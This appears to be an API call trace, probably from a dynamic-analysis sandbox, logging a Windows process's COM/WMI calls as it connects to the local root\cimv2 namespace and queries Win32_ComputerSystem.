	[0262.259] IUnknown:QueryInterface (in: This=0x718dec, riid=0x2cbace8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x5dee6b8 | out: ppvObject=0x5dee6b8*=0x0) returned 0x80004002
	[0262.259] IUnknown:Release (This=0x718dec) returned 0x1
	[0262.259] CoGetClassObject (in: rclsid=0x7b796c*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x746da3b0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x5dee50c | out: ppv=0x5dee50c*=0x635dae8) returned 0x0
	[0262.259] WbemLocator:IUnknown:QueryInterface (in: This=0x635dae8, riid=0x747c7ecc*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x5dee33c | out: ppvObject=0x5dee33c*=0x0) returned 0x80004002
	[0262.259] WbemLocator:IClassFactory:CreateInstance (in: This=0x635dae8, pUnkOuter=0x0, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5dee374 | out: ppvObject=0x5dee374*=0x635cb70) returned 0x0
	[0262.259] WbemLocator:IUnknown:QueryInterface (in: This=0x635cb70, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5dee118 | out: ppvObject=0x5dee118*=0x635cb70) returned 0x0
	[0262.260] WbemLocator:IUnknown:QueryInterface (in: This=0x635cb70, riid=0x74774204*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x5dee0d4 | out: ppvObject=0x5dee0d4*=0x0) returned 0x80004002
	[0262.260] WbemLocator:IUnknown:AddRef (This=0x635cb70) returned 0x3
	[0262.260] CoGetContextToken (in: pToken=0x5dedf60 | out: pToken=0x5dedf60) returned 0x0
	[0262.260] WbemLocator:IUnknown:QueryInterface (in: This=0x635cb70, riid=0x746523cc*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5dedf48 | out: ppvObject=0x5dedf48*=0x0) returned 0x80004002
	[0262.260] CoGetContextToken (in: pToken=0x5dedf58 | out: pToken=0x5dedf58) returned 0x0
	[0262.260] WbemLocator:IUnknown:AddRef (This=0x635cb70) returned 0x4
	[0262.260] WbemLocator:IUnknown:QueryInterface (in: This=0x635cb70, riid=0x746a767c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5dedfcc | out: ppvObject=0x5dedfcc*=0x0) returned 0x80004002
	[0262.261] WbemLocator:IUnknown:Release (This=0x635cb70) returned 0x3
	[0262.261] WbemLocator:IUnknown:Release (This=0x635cb70) returned 0x2
	[0262.261] WbemLocator:IUnknown:Release (This=0x635dae8) returned 0x0
	[0262.261] WbemLocator:IUnknown:Release (This=0x635cb70) returned 0x1
	[0262.261] CoGetContextToken (in: pToken=0x5dee464 | out: pToken=0x5dee464) returned 0x0
	[0262.261] CoGetContextToken (in: pToken=0x5dee424 | out: pToken=0x5dee424) returned 0x0
	[0262.261] WbemLocator:IUnknown:AddRef (This=0x635cb70) returned 0x2
	[0262.261] WbemLocator:IUnknown:QueryInterface (in: This=0x635cb70, riid=0x5dee4a0*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x5dee49c | out: ppvObject=0x5dee49c*=0x635cb70) returned 0x0
	[0262.261] WbemLocator:IUnknown:Release (This=0x635cb70) returned 0x2
	[0262.261] WbemLocator:IUnknown:Release (This=0x635cb70) returned 0x1
	[0262.262] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x635de40, puCount=0x5dee694 | out: puCount=0x5dee694*=0x2) returned 0x0
	[0262.262] WbemDefPath:IWbemPath:GetText (in: This=0x635de40, lFlags=8, puBuffLength=0x5dee690*=0x0, pszText=0x0 | out: puBuffLength=0x5dee690*=0x17, pszText=0x0) returned 0x0
	[0262.262] WbemDefPath:IWbemPath:GetText (in: This=0x635de40, lFlags=8, puBuffLength=0x5dee690*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5dee690*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0262.262] CoCreateInstance (in: rclsid=0x6a3113a0*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x6a3112d0*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x5dee16c | out: ppv=0x5dee16c*=0x635dee8) returned 0x0
	[0262.262] WbemLocator:IWbemLocator:ConnectServer (in: This=0x635dee8, strNetworkResource="\\\\localhost\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x5dee1b8 | out: ppNamespace=0x5dee1b8*=0x6361fac) returned 0x0
	[0262.374] WbemLocator:IUnknown:QueryInterface (in: This=0x6361fac, riid=0x6a311260*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5dee088 | out: ppvObject=0x5dee088*=0x7f910c) returned 0x0
	[0262.374] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x7f910c, pProxy=0x6361fac, pAuthnSvc=0x5dee0d0, pAuthzSvc=0x5dee0cc, pServerPrincName=0x5dee0dc, pAuthnLevel=0x5dee0d4, pImpLevel=0x5dee0c0, pAuthInfo=0x5dee0c4, pCapabilites=0x5dee0c8 | out: pAuthnSvc=0x5dee0d0*=0xa, pAuthzSvc=0x5dee0cc*=0x0, pServerPrincName=0x5dee0dc, pAuthnLevel=0x5dee0d4*=0x6, pImpLevel=0x5dee0c0*=0x2, pAuthInfo=0x5dee0c4, pCapabilites=0x5dee0c8*=0x1) returned 0x0
	[0262.374] WbemLocator:IUnknown:Release (This=0x7f910c) returned 0x1
	[0262.374] WbemLocator:IUnknown:QueryInterface (in: This=0x6361fac, riid=0x6a311250*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5dee07c | out: ppvObject=0x5dee07c*=0x7f912c) returned 0x0
	[0262.374] WbemLocator:IUnknown:QueryInterface (in: This=0x6361fac, riid=0x6a311260*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5dee078 | out: ppvObject=0x5dee078*=0x7f910c) returned 0x0
	[0262.374] WbemLocator:IClientSecurity:SetBlanket (This=0x7f910c, pProxy=0x6361fac, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x4, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0
	[0262.374] WbemLocator:IUnknown:Release (This=0x7f910c) returned 0x2
	[0262.374] WbemLocator:IUnknown:Release (This=0x7f912c) returned 0x1
	[0262.374] CoTaskMemFree (pv=0x7f8588) 
	[0262.374] WbemLocator:IUnknown:Release (This=0x635dee8) returned 0x0
	[0262.375] WbemLocator:IUnknown:QueryInterface (in: This=0x6361fac, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5deda38 | out: ppvObject=0x5deda38*=0x7f912c) returned 0x0
	[0262.375] WbemLocator:IUnknown:QueryInterface (in: This=0x7f912c, riid=0x74774204*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x5ded9f4 | out: ppvObject=0x5ded9f4*=0x0) returned 0x80004002
	[0262.376] WbemLocator:IUnknown:QueryInterface (in: This=0x7f912c, riid=0x746a0b9c*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x5ded8e8 | out: ppvObject=0x5ded8e8*=0x0) returned 0x80004002
	[0262.381] WbemLocator:IUnknown:AddRef (This=0x7f912c) returned 0x3
	[0262.381] CoGetContextToken (in: pToken=0x5ded880 | out: pToken=0x5ded880) returned 0x0
	[0262.381] WbemLocator:IUnknown:QueryInterface (in: This=0x7f912c, riid=0x746523cc*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5ded868 | out: ppvObject=0x5ded868*=0x7f908c) returned 0x0
	[0262.381] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x7f908c, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x5ded870 | out: pCid=0x5ded870*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0262.381] WbemLocator:IUnknown:Release (This=0x7f908c) returned 0x3
	[0262.382] CoGetContextToken (in: pToken=0x5ded878 | out: pToken=0x5ded878) returned 0x0
	[0262.382] WbemLocator:IUnknown:AddRef (This=0x7f912c) returned 0x4
	[0262.382] WbemLocator:IUnknown:QueryInterface (in: This=0x7f912c, riid=0x746a767c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5ded8ec | out: ppvObject=0x5ded8ec*=0x7f9114) returned 0x0
	[0262.382] WbemLocator:IUnknown:Release (This=0x7f912c) returned 0x4
	[0262.382] WbemLocator:IRpcOptions:Query (in: This=0x7f9114, pPrx=0x7f912c, dwProperty=2, pdwValue=0x5ded910 | out: pdwValue=0x5ded910) returned 0x80004002
	[0262.382] WbemLocator:IUnknown:Release (This=0x7f9114) returned 0x3
	[0262.382] WbemLocator:IUnknown:Release (This=0x7f912c) returned 0x2
	[0262.382] CoGetContextToken (in: pToken=0x5dedcec | out: pToken=0x5dedcec) returned 0x0
	[0262.382] CoGetContextToken (in: pToken=0x5dedcac | out: pToken=0x5dedcac) returned 0x0
	[0262.382] WbemLocator:IUnknown:AddRef (This=0x7f912c) returned 0x3
	[0262.383] WbemLocator:IUnknown:QueryInterface (in: This=0x7f912c, riid=0x5dedd28*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x5dedd24 | out: ppvObject=0x5dedd24*=0x6361fac) returned 0x0
	[0262.383] WbemLocator:IUnknown:Release (This=0x7f912c) returned 0x3
	[0262.383] WbemLocator:IUnknown:Release (This=0x6361fac) returned 0x2
	[0262.383] WbemLocator:IUnknown:Release (This=0x6361fac) returned 0x1
	[0262.383] CoGetContextToken (in: pToken=0x5dee608 | out: pToken=0x5dee608) returned 0x0
	[0262.383] WbemLocator:IUnknown:AddRef (This=0x7f912c) returned 0x2
	[0262.383] WbemLocator:IUnknown:QueryInterface (in: This=0x7f912c, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5dee22c | out: ppvObject=0x5dee22c*=0x7f912c) returned 0x0
	[0262.384] WbemLocator:IUnknown:Release (This=0x7f912c) returned 0x2
	[0262.384] WbemLocator:IUnknown:Release (This=0x7f912c) returned 0x1
	[0262.384] CoGetContextToken (in: pToken=0x5dede0c | out: pToken=0x5dede0c) returned 0x0
	[0262.384] CoGetContextToken (in: pToken=0x5deddcc | out: pToken=0x5deddcc) returned 0x0
	[0262.384] WbemLocator:IUnknown:AddRef (This=0x7f912c) returned 0x2
	[0262.384] WbemLocator:IUnknown:QueryInterface (in: This=0x7f912c, riid=0x5dede48*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x5dede44 | out: ppvObject=0x5dede44*=0x6361fac) returned 0x0
	[0262.384] WbemLocator:IUnknown:Release (This=0x7f912c) returned 0x2
	[0262.384] WbemLocator:IUnknown:AddRef (This=0x6361fac) returned 0x3
	[0262.384] IWbemServices:ExecQuery (in: This=0x6361fac, strQueryLanguage="WQL", strQuery="select * from Win32_ComputerSystem", lFlags=16, pCtx=0x0, ppEnum=0x5dee450 | out: ppEnum=0x5dee450*=0x636204c) returned 0x0
	[0262.399] IUnknown:QueryInterface (in: This=0x636204c, riid=0x6a311260*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5dee0fc | out: ppvObject=0x5dee0fc*=0x6362050) returned 0x0
	[0262.399] IClientSecurity:QueryBlanket (in: This=0x6362050, pProxy=0x636204c, pAuthnSvc=0x5dee144, pAuthzSvc=0x5dee140, pServerPrincName=0x5dee150, pAuthnLevel=0x5dee148, pImpLevel=0x5dee134, pAuthInfo=0x5dee138, pCapabilites=0x5dee13c | out: pAuthnSvc=0x5dee144*=0xa, pAuthzSvc=0x5dee140*=0x0, pServerPrincName=0x5dee150, pAuthnLevel=0x5dee148*=0x6, pImpLevel=0x5dee134*=0x2, pAuthInfo=0x5dee138, pCapabilites=0x5dee13c*=0x1) returned 0x0
	[0262.399] IUnknown:Release (This=0x6362050) returned 0x1
	[0262.399] IUnknown:QueryInterface (in: This=0x636204c, riid=0x6a311250*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5dee0f0 | out: ppvObject=0x5dee0f0*=0x7f903c) returned 0x0
	[0262.399] IUnknown:QueryInterface (in: This=0x636204c, riid=0x6a311260*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5dee0ec | out: ppvObject=0x5dee0ec*=0x6362050) returned 0x0
	[0262.399] IClientSecurity:SetBlanket (This=0x6362050, pProxy=0x636204c, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x4, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0
	[0262.404] IUnknown:Release (This=0x6362050) returned 0x2
	[0262.404] WbemLocator:IUnknown:Release (This=0x7f903c) returned 0x1
	[0262.404] CoTaskMemFree (pv=0x7f8528) 
	[0262.404] WbemLocator:IUnknown:Release (This=0x6361fac) returned 0x2
	[0262.404] IUnknown:QueryInterface (in: This=0x636204c, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5dedaa8 | out: ppvObject=0x5dedaa8*=0x7f903c) returned 0x0
	[0262.404] WbemLocator:IUnknown:QueryInterface (in: This=0x7f903c, riid=0x74774204*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x5deda64 | out: ppvObject=0x5deda64*=0x0) returned 0x80004002
	[0262.405] WbemLocator:IUnknown:QueryInterface (in: This=0x7f903c, riid=0x746a0b9c*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x5ded958 | out: ppvObject=0x5ded958*=0x0) returned 0x80004002
	[0262.410] WbemLocator:IUnknown:AddRef (This=0x7f903c) returned 0x3
	[0262.410] CoGetContextToken (in: pToken=0x5ded8f0 | out: pToken=0x5ded8f0) returned 0x0
	[0262.410] WbemLocator:IUnknown:QueryInterface (in: This=0x7f903c, riid=0x746523cc*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5ded8d8 | out: ppvObject=0x5ded8d8*=0x7f8f9c) returned 0x0
	[0262.411] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x7f8f9c, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x5ded8e0 | out: pCid=0x5ded8e0*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0262.411] WbemLocator:IUnknown:Release (This=0x7f8f9c) returned 0x3
	[0262.411] CoGetContextToken (in: pToken=0x5ded8e8 | out: pToken=0x5ded8e8) returned 0x0
	[0262.411] WbemLocator:IUnknown:AddRef (This=0x7f903c) returned 0x4
	[0262.411] WbemLocator:IUnknown:QueryInterface (in: This=0x7f903c, riid=0x746a767c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5ded95c | out: ppvObject=0x5ded95c*=0x7f9024) returned 0x0
	[0262.411] WbemLocator:IUnknown:Release (This=0x7f903c) returned 0x4
	[0262.411] WbemLocator:IRpcOptions:Query (in: This=0x7f9024, pPrx=0x7f903c, dwProperty=2, pdwValue=0x5ded980 | out: pdwValue=0x5ded980) returned 0x80004002
	[0262.411] WbemLocator:IUnknown:Release (This=0x7f9024) returned 0x3
	[0262.412] WbemLocator:IUnknown:Release (This=0x7f903c) returned 0x2
	[0262.412] CoGetContextToken (in: pToken=0x5dedd5c | out: pToken=0x5dedd5c) returned 0x0
	[0262.412] CoGetContextToken (in: pToken=0x5dedd1c | out: pToken=0x5dedd1c) returned 0x0
	[0262.412] WbemLocator:IUnknown:AddRef (This=0x7f903c) returned 0x3
	[0262.412] WbemLocator:IUnknown:QueryInterface (in: This=0x7f903c, riid=0x5dedd98*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x5dedd94 | out: ppvObject=0x5dedd94*=0x636204c) returned 0x0
	[0262.412] WbemLocator:IUnknown:Release (This=0x7f903c) returned 0x3
	[0262.412] IUnknown:Release (This=0x636204c) returned 0x2
	[0262.412] IUnknown:Release (This=0x636204c) returned 0x1
	[0262.412] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x635de40, puCount=0x5dee6e8 | out: puCount=0x5dee6e8*=0x2) returned 0x0
	[0262.412] WbemDefPath:IWbemPath:GetText (in: This=0x635de40, lFlags=4, puBuffLength=0x5dee6e4*=0x0, pszText=0x0 | out: puBuffLength=0x5dee6e4*=0x17, pszText=0x0) returned 0x0
	[0262.413] WbemDefPath:IWbemPath:GetText (in: This=0x635de40, lFlags=4, puBuffLength=0x5dee6e4*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5dee6e4*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0262.413] CoGetContextToken (in: pToken=0x5dee084 | out: pToken=0x5dee084) returned 0x0
	[0262.413] CoGetContextToken (in: pToken=0x5dee044 | out: pToken=0x5dee044) returned 0x0
	[0262.413] WbemLocator:IUnknown:AddRef (This=0x7f903c) returned 0x2
	[0262.413] WbemLocator:IUnknown:QueryInterface (in: This=0x7f903c, riid=0x5dee0c0*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x5dee0bc | out: ppvObject=0x5dee0bc*=0x636204c) returned 0x0
	[0262.413] WbemLocator:IUnknown:Release (This=0x7f903c) returned 0x2
	[0262.413] IUnknown:AddRef (This=0x636204c) returned 0x3
	[0262.413] IEnumWbemClassObject:Clone (in: This=0x636204c, ppEnum=0x5dee6b8 | out: ppEnum=0x5dee6b8*=0x6362114) returned 0x0
	[0262.417] IUnknown:QueryInterface (in: This=0x6362114, riid=0x6a311260*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5dee374 | out: ppvObject=0x5dee374*=0x6362118) returned 0x0
	[0262.417] IClientSecurity:QueryBlanket (in: This=0x6362118, pProxy=0x6362114, pAuthnSvc=0x5dee3bc, pAuthzSvc=0x5dee3b8, pServerPrincName=0x5dee3c8, pAuthnLevel=0x5dee3c0, pImpLevel=0x5dee3ac, pAuthInfo=0x5dee3b0, pCapabilites=0x5dee3b4 | out: pAuthnSvc=0x5dee3bc*=0xa, pAuthzSvc=0x5dee3b8*=0x0, pServerPrincName=0x5dee3c8, pAuthnLevel=0x5dee3c0*=0x6, pImpLevel=0x5dee3ac*=0x2, pAuthInfo=0x5dee3b0, pCapabilites=0x5dee3b4*=0x1) returned 0x0
	[0262.417] IUnknown:Release (This=0x6362118) returned 0x1
	[0262.417] IUnknown:QueryInterface (in: This=0x6362114, riid=0x6a311250*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5dee368 | out: ppvObject=0x5dee368*=0x7f930c) returned 0x0
	[0262.417] IUnknown:QueryInterface (in: This=0x6362114, riid=0x6a311260*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5dee364 | out: ppvObject=0x5dee364*=0x6362118) returned 0x0
	[0262.417] IClientSecurity:SetBlanket (This=0x6362118, pProxy=0x6362114, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x4, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0
	[0262.421] IUnknown:Release (This=0x6362118) returned 0x2
	[0262.421] WbemLocator:IUnknown:Release (This=0x7f930c) returned 0x1
	[0262.421] CoTaskMemFree (pv=0x7f8588) 
	[0262.421] IUnknown:Release (This=0x636204c) returned 0x2
	[0262.422] IUnknown:QueryInterface (in: This=0x6362114, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5dedd10 | out: ppvObject=0x5dedd10*=0x7f930c) returned 0x0
	[0262.422] WbemLocator:IUnknown:QueryInterface (in: This=0x7f930c, riid=0x74774204*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x5dedccc | out: ppvObject=0x5dedccc*=0x0) returned 0x80004002
	[0262.423] WbemLocator:IUnknown:QueryInterface (in: This=0x7f930c, riid=0x746a0b9c*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x5dedbc0 | out: ppvObject=0x5dedbc0*=0x0) returned 0x80004002
	[0262.427] WbemLocator:IUnknown:AddRef (This=0x7f930c) returned 0x3
	[0262.427] CoGetContextToken (in: pToken=0x5dedb58 | out: pToken=0x5dedb58) returned 0x0
	[0262.427] WbemLocator:IUnknown:QueryInterface (in: This=0x7f930c, riid=0x746523cc*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5dedb40 | out: ppvObject=0x5dedb40*=0x7f926c) returned 0x0
	[0262.427] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x7f926c, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x5dedb48 | out: pCid=0x5dedb48*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0262.427] WbemLocator:IUnknown:Release (This=0x7f926c) returned 0x3
	[0262.428] CoGetContextToken (in: pToken=0x5dedb50 | out: pToken=0x5dedb50) returned 0x0
	[0262.428] WbemLocator:IUnknown:AddRef (This=0x7f930c) returned 0x4
	[0262.428] WbemLocator:IUnknown:QueryInterface (in: This=0x7f930c, riid=0x746a767c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5dedbc4 | out: ppvObject=0x5dedbc4*=0x7f92f4) returned 0x0
	[0262.428] WbemLocator:IUnknown:Release (This=0x7f930c) returned 0x4
	[0262.428] WbemLocator:IRpcOptions:Query (in: This=0x7f92f4, pPrx=0x7f930c, dwProperty=2, pdwValue=0x5dedbe8 | out: pdwValue=0x5dedbe8) returned 0x80004002
	[0262.428] WbemLocator:IUnknown:Release (This=0x7f92f4) returned 0x3
	[0262.428] WbemLocator:IUnknown:Release (This=0x7f930c) returned 0x2
	[0262.428] CoGetContextToken (in: pToken=0x5dedfc4 | out: pToken=0x5dedfc4) returned 0x0
	[0262.428] CoGetContextToken (in: pToken=0x5dedf84 | out: pToken=0x5dedf84) returned 0x0
	[0262.428] WbemLocator:IUnknown:AddRef (This=0x7f930c) returned 0x3
	[0262.429] WbemLocator:IUnknown:QueryInterface (in: This=0x7f930c, riid=0x5dee000*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x5dedffc | out: ppvObject=0x5dedffc*=0x6362114) returned 0x0
	[0262.429] WbemLocator:IUnknown:Release (This=0x7f930c) returned 0x3
	[0262.429] IUnknown:Release (This=0x6362114) returned 0x2
	[0262.429] IUnknown:Release (This=0x6362114) returned 0x1
